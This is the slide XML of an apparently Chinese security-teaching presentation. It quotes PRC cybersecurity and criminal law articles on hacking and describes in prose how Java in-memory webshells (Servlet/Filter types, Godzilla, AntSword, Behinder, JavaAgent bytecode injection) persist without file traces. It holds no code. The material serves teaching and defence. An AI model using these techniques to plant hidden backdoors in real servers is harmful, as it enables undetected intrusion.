              <a:t>任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得危害网络安全，不得利用网络从事危害国家安全、荣誉和利益，煽动颠覆国家政权、推翻社会主义制度，煽动分裂国家、破坏国家统一，宣扬恐怖主义、极端主义，宣扬民族仇恨、民族歧视，传播暴力、淫秽色情信息，编造、传播虚假信息扰乱经济秩序和社会秩序，以及侵害他人名誉、隐私、知识产权和其他合法权益等活动。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第二十七条：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>任何个人和组织不得从事非法侵入他人网络、干扰他人网络正常功能、窃取网络数据等危害网络安全的活动；不得提供专门用于从事侵入网络、干扰网络正常功能及防护措施、窃取网络数据等危害网络安全活动的程序、工具；明知他人从事危害网络安全的活动的，不得为其提供技术支持、广告推广、支付结算等帮助。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律法规</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pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第四十四条：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>任何个人和组织不得窃取或者以其他非法方式获取个人信息，不得非法出售或者非法向他人提供个人信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第六十三条：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>违反本法第二十七条规定，从事危害网络安全的活动，或者提供专门用于从事危害网络安全活动的程序、工具，或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助，尚不构成犯罪的，由公安机关没收违法所得，处五日以下拘留，可以并处五万元以上五十万元以下罚款；情节较重的，处五日以上十五日以下拘留，可以并处十万元以上一百万元以下罚款。单位有前款行为的，由公安机关没收违法所得，处十万元以上一百万元以下罚款，并对直接负责的主管人员和其他直接责任人员依照前款规定处罚。违反本法第二十七条规定，受到治安管理处罚的人员，五年内不得从事网络安全管理和网络运营关键岗位的工作；受到刑事处罚的人员，终身不得从事网络安全管理和网络运营关键岗位的工作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第六十四条(第二款)：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>违反本法第四十四条规定，窃取或者以其他非法方式获取、非法出售或者非法向他人提供个人信息，尚不构成犯罪的，由公安机关没收违法所得，并处违法所得一倍以上十倍以下罚款，没有违法所得的，处一百万元以下罚款。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律法规</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zh-CN" altLang="en-US" sz="3200" b="1"/>
              <a:t>以上讲解内容仅用于信息安全教学和演示，请勿用于其他用途！</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800"/>
              <a:t>中国人民共和国</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4800"/>
              <a:t>刑法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1"/>
              <a:t>第二百八十五条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照各该款的规定处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二百八十</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>六</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律法规</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sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>第二百八十</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>六</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1"/>
              <a:t>第二百八十六条之一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>： 网络服务提供者不履行法律、行政法规规定的信息网络安全管理义务，经监管部门责令采取改正措施而拒不改正，有下列情形之一的，处三年以下有期徒刑、拘役或者管制，并处或者单处罚金：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>（一）致使违法信息大量传播的；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>（二）致使用户信息泄露，造成严重后果的；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>（三）致使刑事案件证据灭失，情节严重的；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>（四）有其他严重情节的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000"/>
              <a:t>单位犯前款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照前款的规定处罚。有前两款行为，同时构成其他犯罪的，依照处罚较重的规定定罪处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>法律法规</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en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>第二百八十七条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>利用计算机实施金融诈骗、盗窃、贪污、挪用公款、窃取国家秘密或者其他犯罪的，依照本法有关规定定罪处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>第二百八十七条之一</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t> 利用信息网络实施下列行为之一，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>（一）设立用于实施诈骗、传授犯罪方法、制作或者销售违</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>禁物品、管制物品等违法犯罪活动的网站、通讯群组的；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>（二）发布有关制作或者销售毒品、枪支、淫秽物品等违禁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>物品、管制物品或者其他违法犯罪信息的；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>（三）为实施诈骗等违法犯罪活动发布信息的。单位犯前款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>有前两款行为，同时构成其他犯罪的，依照处罚较重的规定定罪处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1"/>
              <a:t>第二百八十七条之二</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t> 明知他人利用信息网络实施犯罪，为其犯罪提供互联网接入、服务器托管、网络存储、通讯传输等技术支持，或者提供广告推广、支付结算等帮助，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>单位犯前款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000"/>
              <a:t>有前两款行为，同时构成其他犯罪的，依照处罚较重的规定定罪处罚。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000"/>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结语</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8115" y="1213485"/>
            <a:ext cx="7668895" cy="5100955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600" b="1">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>拿刀的不一定是屠夫，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>也有可能是伙夫，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6000">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6000">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>当然也有可能是大夫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="6600">
                <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
                <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="6600">
              <a:latin typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
              <a:ea typeface="仿宋_GB2312" panose="02010609030101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7582535" y="2018030"/>
            <a:ext cx="4329430" cy="3491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en-US" altLang="zh-CN" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据结构型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用内存中数据结构来存储和执行恶意代码的后门程序，直接在内存中修改数据，从而绕过一些安全检查，不依赖具体的API，所以更加灵活，可以适用于更多的环境和场景,但要求对目标系统的内存结构和数据布局有深入的了解，而组件则通过操作数据结构实现特定功能。攻击者则利用组件的特性造成内存马注入 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ervlet、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>F</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ilter、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>istener、Controller；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>哥斯拉：FilterShell和memoryShell两种内存马这些内存马在运行时会创建和操作复杂的数据结构，会在内存中创建数据结构来存储和管理恶意代码的状态，或者使用数据结构来组织和管理被感染的系统的信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>蚁</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>剑：通过字节码直接注入恶意函数，然后通过方法名调用 涉及到了Java的类加载机制和方法调用机制，这些机制背后都有复杂的数据结构在支持例如，Java的类加载器会使用数据结构来存储和管理已加载的类，而方法调用则需要操作调用栈这种数据结构。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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417820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>API型内存马</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>通过hook或替换目标应用程序的API函数， 可以直接控制程序的执行流程，而且由于其是基于API的，所以更加稳定不容易出错</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>；</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>但是API型内存马也有其缺点，那就是它需要知道目标应用程序的API函数地址，这就要求攻击者对目标系统的API有深入的了解此外，API型内存马也会影响到正常的API调用，从而导致程序出现异常(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存飙高，流量抖动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>。用到的技术主要有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaAgent和Javassist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例如：冰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>蝎。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaApi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型内存马是比较依赖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本的，在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2004</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>年之后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>升级到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本之后才开始支持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JavaAgent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：Javaagent技术允许开发者在Java应用程序启动时（通过premain方法）或者在运行时（通过agentmain方法）加载并执行代码这意味着内存马可以利用Javaagent技术，在应用程序启动时或者在运行时植入恶意代码，而不需要重新编译或部署整个应用程序。内存马可以利用Javaagent技术提供的Instrumentation API来修改类的字节码，从而实现持久化驻留在内存中，而不留下任何文件级别的痕迹这使得内存马更难被检测和清除。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Javassist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
